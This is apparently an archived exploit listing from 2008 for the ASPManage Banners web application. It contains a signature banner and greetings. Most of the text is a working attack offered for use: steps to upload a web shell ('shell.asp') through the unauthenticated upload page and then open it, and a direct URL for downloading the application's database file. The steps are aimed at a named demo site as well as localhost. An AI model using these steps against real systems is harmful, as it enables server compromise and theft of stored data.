aspmanage banners - Arbitrary File Upload / File Disclosure
Author: ZoRLu
type: webapps
platform: asp
port:
date_added: 2008-12-06
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
[~] ASPManage Banners RFU/DD Multiple Remote Vuln
[~]
[~] Demo: http://demo.merlix.com/adbanner5
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
exp: ( rfu )
http://localhost/script/banners/shell.asp
exp: ( dd )
http://localhost/script/data/DataBase.mdb
rfu: ( for demo )
you go here:
http://demo.merlix.com/adbanner5/Upload.Asp
select your shell.asp
after click to upload button
go your shell.asp
http://demo.merlix.com/adbanner5/banners/xyz.asp
dd: ( for demo )
http://demo.merlix.com/adbanner5/data/DataBase.mdb
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-12-07]